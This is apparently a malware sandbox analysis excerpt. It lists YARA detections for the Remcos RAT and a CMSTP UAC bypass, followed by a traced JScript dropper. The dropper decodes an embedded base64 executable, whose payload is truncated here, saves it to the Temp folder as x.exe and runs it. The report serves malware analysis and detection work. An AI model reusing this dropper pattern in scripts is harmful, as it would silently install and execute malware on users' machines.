                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:true

                              Call Graph

                              • Executed
                              • Not Executed
                              [Call graph: entry ➔ createElement, GetSpecialFolder, Open, Write, SaveToFile, Run; objects: ActiveXObject("Microsoft.XMLDOM"), ActiveXObject("ADODB.Stream")]

                              Script:

                              Code
                              var D = new ActiveXObject ( "Microsoft.XMLDOM" );
                              var E = D.createElement ( "t" );
                                • createElement("t") ➔
                              E.dataType = "bin.base64";
                              E.text = "TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALo...
                              var b = new ActiveXObject ( "ADODB.Stream" );
                              var p = new ActiveXObject ( "Scripting.FileSystemObject" ).GetSpecialFolder ( 2 );
                                • GetSpecialFolder(2) ➔ C:\Users\engineer\AppData\Local\Temp
                              b.Type = 1;
                              b.Open ( );
                                • Open() ➔ undefined
                              b.Write ( E.nodeTypedValue );
                                • Write() ➔ undefined
                              b.SaveToFile ( p + "\\x.exe", 2 );
                                • SaveToFile("C:\Users\engineer\AppData\Local\Temp\x.exe",2) ➔ undefined
                              new ActiveXObject ( "WScript.Shell" ).Run ( p + "\\x.exe" );
                                • Run("C:\Users\engineer\AppData\Local\Temp\x.exe") ➔ 0